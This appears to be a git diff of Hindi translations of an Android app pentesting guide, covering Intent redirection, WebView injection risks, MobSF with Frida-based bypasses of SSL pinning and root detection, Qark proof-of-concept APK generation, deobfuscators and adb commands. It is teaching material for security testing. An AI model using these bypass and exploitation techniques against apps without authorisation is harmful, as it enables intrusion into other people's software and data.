@ -486,7 +486,7 @@ getWindow().setFlags(LayoutParams.FLAG_SECURE, LayoutParams.FLAG_SECURE);
डेवलपर्स अक्सर प्रॉक्सी घटक जैसे गतिविधियाँ, सेवाएँ, और प्रसारण रिसीवर बनाते हैं जो इन Intents को संभालते हैं और उन्हें `startActivity(...)` या `sendBroadcast(...)` जैसे तरीकों में पास करते हैं, जो जोखिम भरा हो सकता है।
खतरा इस बात में है कि हमलावरों को गैर-निर्यातित ऐप घटकों को ट्रिगर करने या संवेदनशील सामग्री प्रदाताओं तक पहुँचने की अनुमति दी जा, इन Intents को गलत दिशा में भेजकर। एक उल्लेखनीय उदाहरण `WebView` घटक है जो URLs को `Intent` वस्तुओं में `Intent.parseUri(...)` के माध्यम से परिवर्तित करता है और फिर उन्हें निष्पादित करता है, जो संभावित रूप से दुर्भावनापूर्ण Intent इंजेक्शन की ओर ले जा सकता है।
खतरा इस बात में है कि हमलावरों को गैर-निर्यातित ऐप घटकों को ट्रिगर करने या संवेदनशील सामग्री प्रदाताओं तक पहुँचने की अनुमति दी जाती है, इन Intents को गलत दिशा में भेजकर। एक उल्लेखनीय उदाहरण `WebView` घटक है जो URLs को `Intent` वस्तुओं में `Intent.parseUri(...)` के माध्यम से परिवर्तित करता है और फिर उन्हें निष्पादित करता है, जो संभावित रूप से दुर्भावनापूर्ण Intent इंजेक्शन की ओर ले जा सकता है।
### Essential Takeaways
@ -500,8 +500,8 @@ getWindow().setFlags(LayoutParams.FLAG_SECURE, LayoutParams.FLAG_SECURE);
संभवतः आप वेब से इस प्रकार की कमजोरियों के बारे में जानते हैं। आपको Android एप्लिकेशन में इन कमजोरियों के प्रति विशेष रूप से सतर्क रहना चाहिए:
- **SQL Injection:** गतिशील प्रश्नों या सामग्री-प्रदाताओं के साथ काम करते समय सुनिश्चित करें कि आप पैरामीटरयुक्त प्रश्नों का उपयोग कर रहे हैं।
- **JavaScript Injection (XSS):** सुनिश्चित करें कि किसी भी WebViews के लिए JavaScript और प्लगइन समर्थन अक्षम है (डिफ़ॉल्ट रूप से अक्षम)। [More info here](webview-attacks.md#javascript-enabled).
- **Local File Inclusion:** WebViews को फ़ाइल प्रणाली तक पहुँच अक्षम होनी चाहिए (डिफ़ॉल्ट रूप से सक्षम) - `(webview.getSettings().setAllowFileAccess(false);)`। [More info here](webview-attacks.md#javascript-enabled).
- **JavaScript Injection (XSS):** सुनिश्चित करें कि किसी भी WebViews के लिए JavaScript और प्लगइन समर्थन बंद है (डिफ़ॉल्ट रूप से बंद)। [More info here](webview-attacks.md#javascript-enabled).
- **Local File Inclusion:** WebViews को फ़ाइल प्रणाली तक पहुँच को बंद करना चाहिए (डिफ़ॉल्ट रूप से सक्षम) - `(webview.getSettings().setAllowFileAccess(false);)`। [More info here](webview-attacks.md#javascript-enabled).
- **Eternal cookies**: कई मामलों में जब Android एप्लिकेशन सत्र समाप्त करता है, तो कुकी को रद्द नहीं किया जाता है या इसे डिस्क पर भी सहेजा जा सकता है।
- [**Secure Flag** in cookies](../../pentesting-web/hacking-with-cookies/#cookies-flags)
@ -523,7 +523,7 @@ docker run -it -p 8000:8000 opensecurity/mobile-security-framework-mobsf:latest
ध्यान दें कि MobSF **Android**(apk)**, IOS**(ipa) **और Windows**(apx) अनुप्रयोगों का विश्लेषण कर सकता है (_Windows अनुप्रयोगों का विश्लेषण Windows होस्ट में स्थापित MobSF से किया जाना चाहिए_)।\
इसके अलावा, यदि आप एक **ZIP** फ़ाइल बनाते हैं जिसमें एक **Android** या **IOS** ऐप का स्रोत कोड होता है (अनुप्रयोग के रूट फ़ोल्डर पर जाएं, सब कुछ चुनें और एक ZIP फ़ाइल बनाएं), तो यह इसका विश्लेषण भी कर सकेगा।
MobSF आपको **diff/Compare** विश्लेषण करने और **VirusTotal** को एकीकृत करने की अनुमति भी देता है (आपको _MobSF/settings.py_ में अपन API कुंजी सेट करने की आवश्यकता होगी और इसे सक्षम करना होगा: `VT_ENABLED = TRUE` `VT_API_KEY = <Your API key>` `VT_UPLOAD = TRUE`)। आप `VT_UPLOAD` को `False` पर भी सेट कर सकते हैं, तब **hash** फ़ाइल के बजाय **upload** किया जाएगा।
MobSF आपको **diff/Compare** विश्लेषण करने और **VirusTotal** को एकीकृत करने की अनुमति भी देता है (आपको _MobSF/settings.py_ में अपन API कुंजी सेट करने की आवश्यकता होगी और इसे सक्षम करना होगा: `VT_ENABLED = TRUE` `VT_API_KEY = <Your API key>` `VT_UPLOAD = TRUE`)। आप `VT_UPLOAD` को `False` पर भी सेट कर सकते हैं, तब **hash** फ़ाइल के बजाय **upload** किया जाएगा।
### MobSF के साथ सहायक गतिशील विश्लेषण
@ -534,15 +534,15 @@ MobSF आपको **diff/Compare** विश्लेषण करने और
- **HTTPS ट्रैफ़िक कैप्चर करें**
- **Frida** का उपयोग करके **runtime** **जानकारी** प्राप्त करें
Android **संस्करण > 5** से, यह **स्वचालित रूप से Frida** शुरू करेगा और **ट्रैफ़िक** कैप्चर करने के लिए वैश्विक **proxy** सेटिंग्स सेट करेगा। यह केवल परीक्षण किए गए अनुप्रयोग से ट्रैफ़िक कैप्चर करेगा।
Android **संस्करण > 5** से, यह **स्वचालित रूप से Frida** शुरू करेगा और **ट्रैफ़िक कैप्चर** करने के लिए वैश्विक **proxy** सेटिंग्स सेट करेगा। यह केवल परीक्षण किए गए अनुप्रयोग से ट्रैफ़िक कैप्चर करेगा।
**Frida**
डिफ़ॉल्ट रूप से, यह **SSL पिनिंग**, **root detection** और **debugger detection** को **बायपास** करने और **दिलचस्प APIs** की निगरानी करने के लिए कुछ Frida स्क्रिप्ट्स का भी उपयोग करेगा।\
डिफ़ॉल्ट रूप से, यह **SSL पिनिंग**, **root detection** और **debugger detection** को **बायपास** करने और **दिलचस्प APIs** की निगरानी करने के लिए कुछ Frida स्क्रिप्ट का भी उपयोग करेगा।\
MobSF **निर्यातित गतिविधियों** को **invoke** कर सकता है, उनके **स्क्रीनशॉट** ले सकता है और उन्हें रिपोर्ट के लिए **सहेज** सकता है।
गतिशील परीक्षण **शुरू करने** के लिए हरे बटन पर दबाएं: "**Start Instrumentation**"। **Frida Live Logs** पर दबाएं ताकि Frida स्क्रिप्ट द्वारा उत्पन्न लॉग देख सकें और "**Live API Monitor**" पर दबाएं ताकि सभी हुक किए गए तरीकों, पारित तर्कों और लौटाए गए मानों के आवाहनों को देख सकें (यह "Start Instrumentation" दबाने के बाद दिखाई देगा)।\
MobSF आपको अपनी **Frida स्क्रिप्ट** लोड करने की अनुमति भी देता है (अपने शुक्रवार स्क्रिप्ट के परिणाम MobSF को भेजने के लिए `send()` फ़ंक्शन का उपयोग करें)। इसमें **कई पूर्व-लिखित स्क्रिप्ट** भी हैं जिन्हें आप लोड कर सकते हैं (आप `MobSF/DynamicAnalyzer/tools/frida_scripts/others/` में और जोड़ सकते हैं), बस **उन्हें चुनें**, "**Load**" पर दबाएं और "**Start Instrumentation**" पर दबाएं (आप उस स्क्रिप्ट के लॉग "**Frida Live Logs**" के अंदर देख सकेंगे)।
गतिशील परीक्षण **शुरू** करने के लिए हरे बटन पर दबाएं: "**Start Instrumentation**"। **Frida Live Logs** पर दबाएं ताकि Frida स्क्रिप्ट द्वारा उत्पन्न लॉग देख सकें और "**Live API Monitor**" पर दबाएं ताकि सभी हुक किए गए तरीकों, पास किए गए तर्कों और लौटाए गए मानों के आवाहनों को देख सकें (यह "Start Instrumentation" दबाने के बाद दिखाई देगा)।\
MobSF आपको अपनी **Frida स्क्रिप्ट** लोड करने की भी अनुमति देता है (अपने शुक्रवार स्क्रिप्ट के परिणाम MobSF को भेजने के लिए `send()` फ़ंक्शन का उपयोग करें)। इसमें **कई पूर्व-लिखित स्क्रिप्ट** भी हैं जिन्हें आप लोड कर सकते हैं (आप `MobSF/DynamicAnalyzer/tools/frida_scripts/others/` में और जोड़ सकते हैं), बस **उन्हें चुनें**, "**Load**" पर दबाएं और "**Start Instrumentation**" पर दबाएं (आप उस स्क्रिप्ट के लॉग "**Frida Live Logs**" के अंदर देख सकेंगे)।
![](<../../images/image (419).png>)
@ -550,7 +550,7 @@ MobSF आपको अपनी **Frida स्क्रिप्ट** लोड
- **लोड की गई कक्षाओं की गणना करें**: यह सभी लोड की गई कक्षाओं को प्रिंट करेगा
- **स्ट्रिंग कैप्चर करें**: यह अनुप्रयोग का उपयोग करते समय सभी कैप्चर की गई स्ट्रिंग्स को प्रिंट करेगा (बहुत शोर)
- **स्ट्रिंग तुलना कैप्चर करें**: यह बहुत उपयोगी हो सकता है। यह **दो स्ट्रिंग्स को दिखाएगा जो तुलना की जा रही हैं** और यदि परिणाम सत्य या असत्य था।
- **स्ट्रिंग तुलना कैप्चर करें**: यह बहुत उपयोगी हो सकता है। यह **2 स्ट्रिंग्स को दिखाएगा जो तुलना की जा रही हैं** और यदि परिणाम सत्य या असत्य था।
- **कक्षा विधियों की गणना करें**: कक्षा का नाम डालें (जैसे "java.io.File") और यह कक्षा की सभी विधियों को प्रिंट करेगा।
- **कक्षा पैटर्न खोजें**: पैटर्न द्वारा कक्षाओं की खोज करें
- **कक्षा विधियों को ट्रेस करें**: **पूरी कक्षा को ट्रेस करें** (कक्षा की सभी विधियों के इनपुट और आउटपुट देखें)। याद रखें कि डिफ़ॉल्ट रूप से MobSF कई दिलचस्प Android API विधियों को ट्रेस करता है।
@ -570,7 +570,7 @@ receivers
```
**HTTP उपकरण**
जब http ट्रैफ़िक कैप्चर किया जाता है, तो आप "**HTTP(S) ट्रैफ़िक**" नीचे कैप्चर किए गए ट्रैफ़िक का एक खराब दृश्य देख सकते हैं या "**Start HTTPTools**" हरे बटन में एक बेहतर दृश्य देख सकते हैं। दूसरे विकल्प से, आप **कैप्चर किए गए अनुरोधों** को **प्रॉक्सी** जैसे Burp या Owasp ZAP पर **भेज** सकते हैं।\
जब http ट्रैफ़िक कैप्चर किया जाता है, तो आप "**HTTP(S) ट्रैफ़िक**" के नीचे कैप्चर किए गए ट्रैफ़िक का एक भद्दा दृश्य देख सकते हैं या "**Start HTTPTools**" हरे बटन में एक बेहतर दृश्य देख सकते हैं। दूसरे विकल्प से, आप **कैप्चर किए गए अनुरोधों** को **प्रॉक्सी** जैसे Burp या Owasp ZAP को **भेज** सकते हैं।\
इसके लिए, _Burp चालू करें -->_ _Intercept बंद करें --> MobSB HTTPTools में अनुरोध का चयन करें_ --> "**Send to Fuzzer**" दबाएं --> _प्रॉक्सी पता चुनें_ ([http://127.0.0.1:8080\\](http://127.0.0.1:8080))।
एक बार जब आप MobSF के साथ गतिशील विश्लेषण समाप्त कर लेते हैं, तो आप "**Start Web API Fuzzer**" पर दबा सकते हैं ताकि **http अनुरोधों को फज़** किया जा सके और कमजोरियों की तलाश की जा सके।
@ -589,13 +589,13 @@ receivers
### [Yaazhini](https://www.vegabird.com/yaazhini/)
यह एक **ग्रेट टूल है GUI के साथ स्थिर विश्लेषण करने के लिए**
यह एक **ग्रेट टूल है स्टैटिक एनालिसिस करने के लिए GUI के साथ**
![](<../../images/image (741).png>)
### [Qark](https://github.com/linkedin/qark)
यह उपकरण कई **सुरक्षा संबंधित Android अनुप्रयोग कमजोरियों** की तलाश करने के लिए डिज़ाइन किया गया है, चाहे वह **स्रोत कोड** में हो या **पैक किए गए APKs** में। यह उपकरण **"Proof-of-Concept" डिप्लॉय करने योग्य APK** और **ADB कमांड** बनाने में भी **सक्षम है**, ताकि कुछ पाए गए कमजोरियों (Exposed activities, intents, tapjacking...) का शोषण किया जा सके। Drozer की तरह, परीक्षण उपकरण को रूट करने की आवश्यकता नहीं है।
यह उपकरण कई **सुरक्षा संबंधित Android अनुप्रयोग कमजोरियों** की तलाश करने के लिए डिज़ाइन किया गया है, चाहे वह **स्रोत कोड** में हो या **पैक किए गए APKs** में। यह उपकरण एक "प्रूफ-ऑफ-कॉन्सेप्ट" तैनात करने योग्य APK और **ADB कमांड** बनाने में भी **सक्षम है**, ताकि कुछ पाए गए कमजोरियों (Exposed activities, intents, tapjacking...) का शोषण किया जा सके। Drozer के साथ, परीक्षण उपकरण को रूट करने की आवश्यकता नहीं है।
```bash
pip3 install --user qark # --user is only needed if not using a virtualenv
qark --apk path/to/my.apk
@ -619,7 +619,7 @@ SUPER एक कमांड-लाइन एप्लिकेशन है ज
सभी नियम `rules.json` फ़ाइल में केंद्रित हैं, और प्रत्येक कंपनी या परीक्षक अपने आवश्यक विश्लेषण के लिए अपने नियम बना सकता है।
नवीनतम बाइनरी [डाउनलोड पृष्ठ](https://superanalyzer.rocks/download.html) से डाउनलोड करें।
नवीनतम बाइनरीज़ [download page](https://superanalyzer.rocks/download.html) से डाउनलोड करें।
```
super-analyzer {apk_file}
```
@ -657,15 +657,15 @@ python androwarn.py -i my_application_to_be_analyzed.apk -r html -v 3
![](<../../images/image (595).png>)
**MARA** एक **M**obile **A**pplication **R**everse engineering और **A**nalysis Framework है। यह एक उपकरण है जो सामान्यतः उपयोग किए जाने वाले मोबाइल एप्लिकेशन रिवर्स इंजीनियरिंग और विश्लेषण उपकरणों को एक साथ लाता है, ताकि मोबाइल एप्लिकेशनों का परीक्षण OWASP मोबाइल सुरक्षा खतरों के खिलाफ किया जा सके। इसका उद्देश्य इस कार्य को मोबाइल एप्लिकेशन डेवलपर्स और सुरक्षा पेशेवरों के लिए आसान और मित्रवत बनाना है।
**MARA** एक **M**obile **A**pplication **R**everse engineering और **A**nalysis Framework है। यह एक उपकरण है जो सामान्यतः उपयोग किए जाने वाले मोबाइल एप्लिकेशन रिवर्स इंजीनियरिंग और विश्लेषण उपकरणों को एक साथ लाता है, ताकि OWASP मोबाइल सुरक्षा खतरों के खिलाफ मोबाइल एप्लिकेशनों का परीक्षण करने में सहायता मिल सके। इसका उद्देश्य इस कार्य को मोबाइल एप्लिकेशन डेवलपर्स और सुरक्षा पेशेवरों के लिए आसान और मित्रवत बनाना है।
यह सक्षम है:
- विभिन्न उपकरणों का उपयोग करके Java और Smali कोड निकालना
- APKs का विश्लेषण करना: [smalisca](https://github.com/dorneanu/smalisca), [ClassyShark](https://github.com/google/android-classyshark), [androbugs](https://github.com/AndroBugs/AndroBugs_Framework), [androwarn](https://github.com/maaaaz/androwarn), [APKiD](https://github.com/rednaga/APKiD) का उपयोग करके
- [smalisca](https://github.com/dorneanu/smalisca), [ClassyShark](https://github.com/google/android-classyshark), [androbugs](https://github.com/AndroBugs/AndroBugs_Framework), [androwarn](https://github.com/maaaaz/androwarn), [APKiD](https://github.com/rednaga/APKiD) का उपयोग करके APKs का विश्लेषण करना
- regexps का उपयोग करके APK से निजी जानकारी निकालना।
- Manifest का विश्लेषण करना।
- पाए गए डोमेन का विश्लेषण करना: [pyssltest](https://github.com/moheshmohan/pyssltest), [testssl](https://github.com/drwetter/testssl.sh) और [whatweb](https://github.com/urbanadventurer/WhatWeb) का उपयोग करके
- मैनिफेस्ट का विश्लेषण करना।
- [pyssltest](https://github.com/moheshmohan/pyssltest), [testssl](https://github.com/drwetter/testssl.sh) और [whatweb](https://github.com/urbanadventurer/WhatWeb) का उपयोग करके पाए गए डोमेन का विश्लेषण करना
- [apk-deguard.com](http://www.apk-deguard.com) के माध्यम से APK को डिओबफस्केट करना
### Koodous
@ -678,9 +678,9 @@ python androwarn.py -i my_application_to_be_analyzed.apk -r html -v 3
### [ProGuard](<https://en.wikipedia.org/wiki/ProGuard_(software)>)
[Wikipedia](<https://en.wikipedia.org/wiki/ProGuard_(software)>): **ProGuard** एक ओपन-सोर्स कमांड-लाइन उपकरण है जो Java कोड को संकुचित, अनुकूलित और ओबफस्केट करता है। यह बाइटकोड को अनुकूलित करने के साथ-साथ अप्रयुक्त निर्देशों का पता लगाने और उन्हें हटाने में सक्षम है। ProGuard मुफ्त सॉफ़्टवेयर है और इसे GNU जनरल पब्लिक लाइसेंस, संस्करण 2 के तहत वितरित किया जाता है।
[विकिपीडिया](<https://en.wikipedia.org/wiki/ProGuard_(software)>): **ProGuard** एक ओपन-सोर्स कमांड-लाइन उपकरण है जो Java कोड को संकुचित, अनुकूलित और ओबफस्केट करता है। यह बाइटकोड को अनुकूलित करने के साथ-साथ अप्रयुक्त निर्देशों का पता लगाने और उन्हें हटाने में सक्षम है। ProGuard मुफ्त सॉफ़्टवेयर है और इसे GNU जनरल पब्लिक लाइसेंस, संस्करण 2 के तहत वितरित किया जाता है।
ProGuard Android SDK का एक हिस्सा के रूप में वितरित किया जाता है और रिलीज़ मोड में एप्लिकेशन बनाने पर चलता है।
ProGuard Android SDK का एक हिस्सा है और रिलीज़ मोड में एप्लिकेशन बनाते समय चलता है।
### [DexGuard](https://www.guardsquare.com/dexguard)
@ -690,15 +690,15 @@ APK को डिओबफस्केट करने के लिए चर
- एक संसाधन को InputStream के रूप में लोड करें;
- इसे डिक्रिप्ट करने के लिए FilterInputStream से विरासत में मिली एक कक्षा को परिणाम दें;
- एक रिवर्सर से कुछ मिनटों का समय बर्बाद करने के लिए कुछ बेकार ओबफस्केशन करें;
- एक रिवर्सर के समय को बर्बाद करने के लिए कुछ बेकार ओबफस्केशन करें;
- DEX फ़ाइल प्राप्त करने के लिए डिक्रिप्टेड परिणाम को ZipInputStream में दें;
- अंततः `loadDex` विधि का उपयोग करके परिणामस्वरूप DEX को एक Resource के रूप में लोड करें।
- अंततः `loadDex` विधि का उपयोग करके परिणामस्वरूप DEX को एक संसाधन के रूप में लोड करें।
### [DeGuard](http://apk-deguard.com)
**DeGuard Android ओबफस्केशन उपकरणों द्वारा किए गए ओबफस्केशन की प्रक्रिया को उलटता है। यह कोड निरीक्षण और पुस्तकालयों की भविष्यवाणी सहित कई सुरक्षा विश्लेषणों को सक्षम बनाता है।**
आप उनके प्लेटफॉर्म पर एक ओबफस्केटेड APK अपलोड कर सकते हैं।
आप उनके प्लेटफॉर्म पर एक ओबफस्केटेड APK अपलोड कर सकते हैं।
### [Deobfuscate android App](https://github.com/In3tinct/deobfuscate-android-app)
@ -706,21 +706,21 @@ APK को डिओबफस्केट करने के लिए चर
### [Simplify](https://github.com/CalebFenton/simplify)
यह एक **generic android deobfuscator** है। Simplify **virtually executes an app** ताकि इसके व्यवहार को समझा जा सके और फिर **कोड को अनुकूलित करने की कोशिश करता है** ताकि यह समान रूप से व्यवहार करे लेकिन मानव के लिए समझना आसान हो। प्रत्येक अनुकूलन प्रकार सरल और सामान्य है, इसलिए यह मायने नहीं रखता कि उपयोग की जाने वाली ओबफस्केशन का विशिष्ट प्रकार क्या है।
यह एक **generic android deobfuscator** है। Simplify **virtually executes an app** ताकि इसके व्यवहार को समझा जा सके और फिर **कोड को अनुकूलित करने की कोशिश करता है** ताकि यह समान रूप से व्यवहार करे लेकिन इसे मानव के लिए समझना आसान हो। प्रत्येक अनुकूलन प्रकार सरल और सामान्य है, इसलिए यह मायने नहीं रखता कि उपयोग की जाने वाली ओबफस्केशन का विशिष्ट प्रकार क्या है।
### [APKiD](https://github.com/rednaga/APKiD)
APKiD आपको **यह जानकारी देता है कि एक APK कैसे बनाया गया था**। यह कई **कंपाइलर्स**, **पैकर**, **ओबफस्केटर्स**, और अन्य अजीब चीजों की पहचान करता है। यह Android के लिए [_PEiD_](https://www.aldeid.com/wiki/PEiD) है।
APKiD आपको **यह जानकारी देता है कि एक APK कैसे बनाई गई थी**। यह कई **कंपाइलर्स**, **पैकर**, **ओबफस्केटर्स**, और अन्य अजीब चीजों की पहचान करता है। यह Android के लिए [_PEiD_](https://www.aldeid.com/wiki/PEiD) है।
### Manual
[Read this tutorial to learn some tricks on **how to reverse custom obfuscation**](manual-deobfuscation.md)
[कस्टम ओबफस्केशन को रिवर्स करने के कुछ ट्रिक्स सीखने के लिए इस ट्यूटोरियल को पढ़ें](manual-deobfuscation.md)
## Labs
### [Androl4b](https://github.com/sh4hin/Androl4b)
AndroL4b एक Android सुरक्षा वर्चुअल मशीन है जो ubuntu-mate पर आधारित है जिसमें रिवर्स इंजीनियरिंग और मैलवेयर विश्लेषण के लिए विभिन्न सुरक्षा विशेषज्ञों और शोधकर्ताओं से नवीनतम फ्रेमवर्क, ट्यूटोरियल और प्रयोगशालाओं का संग्रह शामिल है।
AndroL4b एक Android सुरक्षा वर्चुअल मशीन है जो ubuntu-mate पर आधारित है जिसमें रिवर्स इंजीनियरिंग और मैलवेयर विश्लेषण के लिए विभिन्न सुरक्षा गीक और शोधकर्ताओं से नवीनतम फ्रेमवर्क, ट्यूटोरियल और प्रयोगशालाओं का संग्रह शामिल है।
## References

8
src/mobile-pentesting/android-app-pentesting/adb-commands.md
View File

@ -30,7 +30,7 @@ adb server version (41) doesn't match this client (36); killing...
## कई उपकरण
जब भी आप **अपने मशीन से जुड़े कई उपकरण** पाते हैं, तो आपको यह **निर्धारित करना होगा कि आप adb कमांड किस पर चलाना चाहते हैं**
जब भी आप **अपने मशीन से जुड़े कई उपकरण** पाते हैं, तो आपको यह **निर्धारित करना होगा कि आप adb कमांड किस पर चलाना चाहते हैं**
```bash
adb devices
List of devices attached
@ -78,7 +78,7 @@ adb uninstall -k com.test.app Keep the data and cache directories around after p
```
## पैकेज
सभी पैकेज प्रिंट करता है, वैकल्पिक रूप से केवल उन पैकेजों को जिनका पैकेज नाम \<FILTER> में पाठ को शामिल करता है।
सभी पैकेज प्रिंट करता है, वैकल्पिक रूप से केवल उन पैकेजों को जिनका पैकेज नाम \<FILTER> में पाठ शामिल है।
### adb shell pm list packages \[options] \<FILTER-STR>
```bash
@ -136,7 +136,7 @@ adb shell screencap /sdcard/screen.png
```
### adb shell screenrecord \[options] \<filename>
Android 4.4 (API स्तर 19) और उच्चतर चलाने वाले उपकरणों की डिस्प्ले रिकॉर्ड करना
Android 4.4 (API स्तर 19) और उच्चतर चलाने वाले उपकरणों की डिस्प्ले रिकॉर्डिंग
```bash
adb shell screenrecord /sdcard/demo.mp4
adb shell screenrecord --size <WIDTHxHEIGHT>
@ -196,7 +196,7 @@ adb root
```bash
adb sideload <update.zip>
```
एंड्रॉइड update.zip पैकेज को फ्लैश/रिस्टोर करना
फ्लैशिंग/पुनर्स्थापना Android update.zip पैकेज
# लॉग

74
src/mobile-pentesting/android-app-pentesting/android-applications-basics.md
View File

@ -25,7 +25,7 @@ Android 5.0(L) से **SELinux** लागू किया गया है।
### Permissions
जब आप एक **ऐप इंस्टॉल करते हैं और यह अनुमतियों के लिए पूछता है**, तो ऐप **`uses-permission`** तत्वों में कॉन्फ़िगर की गई अनुमतियों के लिए पूछ रहा है जो **AndroidManifest.xml** फ़ाइल में हैं। **uses-permission** तत्व अनुरोधित अनुमति का नाम **name** **attribute** के अंदर इंगित करता है। इसमें **maxSdkVersion** attribute भी है जो निर्दिष्ट संस्करण से उच्च संस्करणों पर अनुमतियों के लिए पूछना बंद कर देता है।\
जब आप एक **ऐप इंस्टॉल करते हैं और यह अनुमतियों के लिए पूछता है**, तो ऐप **`uses-permission`** तत्वों में कॉन्फ़िगर की गई अनुमतियों के लिए पूछ रहा है जो **AndroidManifest.xml** फ़ाइल में हैं। **uses-permission** तत्व अनुरोधित अनुमति के नाम को **name** **attribute** के अंदर इंगित करता है। इसमें **maxSdkVersion** attribute भी है जो निर्दिष्ट संस्करण से उच्च संस्करणों पर अनुमतियों के लिए पूछना बंद कर देता है।\
ध्यान दें कि एंड्रॉइड अनुप्रयोगों को शुरुआत में सभी अनुमतियों के लिए पूछने की आवश्यकता नहीं है, वे **डायनामिकली अनुमतियों के लिए भी पूछ सकते हैं** लेकिन सभी अनुमतियों को **मैनिफेस्ट में घोषित** किया जाना चाहिए।
जब एक ऐप कार्यक्षमता को उजागर करता है, तो यह **केवल उन ऐप्स तक पहुंच को सीमित कर सकता है जिनके पास एक निर्दिष्ट अनुमति है**।\
@ -34,10 +34,10 @@ Android 5.0(L) से **SELinux** लागू किया गया है।
- अनुमति का **नाम**
- **permission-group** attribute, जो संबंधित अनुमतियों को समूहित करने की अनुमति देता है।
- **protection-level** जो इंगित करता है कि अनुमतियाँ कैसे दी जाती हैं। चार प्रकार हैं:
- **Normal**: जब ऐप के लिए **कोई ज्ञात खतरे** नहीं होते हैं। उपयोगकर्ता को **इसे मंजूरी देने की आवश्यकता नहीं है**।
- **Dangerous**: इंगित करता है कि अनुमति अनुरोध करने वाले अनुप्रयोग को कुछ **उच्च पहुंच** प्रदान करती है। **उपयोगकर्ताओं से उन्हें मंजूरी देने के लिए कहा जाता है**।
- **Normal**: जब ऐप के लिए **कोई ज्ञात खतरे** नहीं होते हैं। उपयोगकर्ता को **इसे मंजूर करने की आवश्यकता नहीं है**।
- **Dangerous**: इंगित करता है कि अनुमति अनुरोध करने वाले अनुप्रयोग को कुछ **उच्च पहुंच** प्रदान करती है। **उपयोगकर्ताओं से उन्हें मंजूर करने के लिए कहा जाता है**।
- **Signature**: केवल **उसी प्रमाणपत्र द्वारा हस्ताक्षरित ऐप्स** को अनुमति दी जा सकती है जो घटक को निर्यात करता है। यह सुरक्षा का सबसे मजबूत प्रकार है।
- **SignatureOrSystem**: केवल **उसी प्रमाणपत्र द्वारा हस्ताक्षरित ऐप्स** को अनुमति दी जा सकती है जो घटक को निर्यात करता है या **सिस्टम-स्तरीय पहुंच के साथ चलने वाले ऐप्स** को अनुमति दी जा सकती है।
- **SignatureOrSystem**: केवल **उसी प्रमाणपत्र द्वारा हस्ताक्षरित ऐप्स** या **सिस्टम-स्तरीय पहुंच के साथ चलने वाले ऐप्स** को अनुमतियाँ दी जा सकती है
## Pre-Installed Applications
@ -66,7 +66,7 @@ Android 5.0(L) से **SELinux** लागू किया गया है।
### Implications
एक बार जब डिवाइस रूट हो जाता है, तो कोई भी ऐप रूट के रूप में एक्सेस का अनुरोध कर सकता है। यदि एक दुर्भावनापूर्ण ऐप इसे प्राप्त कर लेता है, तो यह लगभग सब कुछ तक पहुंच प्राप्त कर लेगा और फोन को नुकसान पहुँचा सकेगा।
एक बार जब डिवाइस रूट हो जाता है, तो कोई भी ऐप रूट के रूप में एक्सेस का अनुरोध कर सकता है। यदि एक दुर्भावनापूर्ण ऐप इसे प्राप्त करता है, तो यह लगभग सब कुछ तक पहुंच प्राप्त कर लेगा और फोन को नुकसान पहुँचा सकेगा।
## Android Application Fundamentals <a href="#2-android-application-fundamentals" id="2-android-application-fundamentals"></a>
@ -79,7 +79,7 @@ Android 5.0(L) से **SELinux** लागू किया गया है।
- META-INF/
- यहीं पर प्रमाणपत्र स्थित है!
- **classes.dex**
- इसमें डलविक बाइटकोड होता है, जो संकलित जावा (या कोटलिन) कोड का प्रतिनिधित्व करता है जिसे अनुप्रयोग डिफ़ॉल्ट रूप से निष्पादित करता है।
- इसमें डलविक बाइटकोड होता है, जो संकलित जावा (या कोटलिन) कोड का प्रतिनिधित्व करता है जिसे अनुप्रयोग डिफ़ॉल्ट रूप से निष्पादित करता है।
- lib/
- इसमें मूलभूत पुस्तकालय होते हैं, जो उपनिर्देशिकाओं में CPU आर्किटेक्चर द्वारा विभाजित होते हैं।
- `armeabi`: ARM आधारित प्रोसेसर के लिए कोड
@ -93,7 +93,7 @@ Android 5.0(L) से **SELinux** लागू किया गया है।
### **Dalvik & Smali**
एंड्रॉइड विकास में, **Java या Kotlin** का उपयोग ऐप बनाने के लिए किया जाता है। डेस्कटॉप ऐप्स की तरह JVM का उपयोग करने के बजाय, एंड्रॉइड इस कोड को **Dalvik Executable (DEX) बाइटकोड** में संकलित करता है। पहले, डलविक वर्चुअल मशीन इस बाइटकोड को संभालती थी, लेकिन अब, नए एंड्रॉइड संस्करणों में, एंड्रॉइड रनटाइम (ART) इसका प्रभार लेता है।
एंड्रॉइड विकास में, **Java या Kotlin** का उपयोग ऐप बनाने के लिए किया जाता है। डेस्कटॉप ऐप्स की तरह JVM का उपयोग करने के बजाय, एंड्रॉइड इस कोड को **Dalvik Executable (DEX) बाइटकोड** में संकलित करता है। पहले, डलविक वर्चुअल मशीन इस बाइटकोड को संभालती थी, लेकिन अब, नए एंड्रॉइड संस्करणों में, एंड्रॉइड रनटाइम (ART) इसका प्रबंधन करता है।
रिवर्स इंजीनियरिंग के लिए, **Smali** महत्वपूर्ण हो जाता है। यह DEX बाइटकोड का मानव-पठनीय संस्करण है, जो स्रोत कोड को बाइटकोड निर्देशों में अनुवाद करके असेंबली भाषा की तरह कार्य करता है। इस संदर्भ में Smali और baksmali असेंबली और डिस्सेम्बली उपकरणों को संदर्भित करते हैं।
@ -105,7 +105,7 @@ Intents एंड्रॉइड ऐप्स के बीच उनके घ
सरलता के लिए Intent का उपयोग किया जा सकता है:
- एक गतिविधि शुरू करने के लिए, आमतौर पर एक ऐप के लिए उपयोगकर्ता इंटरफ़ेस खोलना
- सिस्टम और ऐप्स को परिवर्तनों की जानकारी देने के लिए प्रसारण के रूप में
- सिस्टम और ऐप्स को परिवर्तनों की सूचना देने के लिए प्रसारण के रूप में
- एक पृष्ठभूमि सेवा को शुरू करने, रोकने और संवाद करने के लिए
- ContentProviders के माध्यम से डेटा तक पहुँचने के लिए
- घटनाओं को संभालने के लिए कॉलबैक के रूप में
@ -118,9 +118,9 @@ Intents एंड्रॉइड ऐप्स के बीच उनके घ
Intent Filters श्रेणियों, क्रियाओं और डेटा फ़िल्टरों से बने होते हैं, जिसमें अतिरिक्त मेटाडेटा शामिल करने की संभावना होती है। यह सेटअप घटकों को उन विशिष्ट Intents को संभालने की अनुमति देता है जो घोषित मानदंडों से मेल खाते हैं।
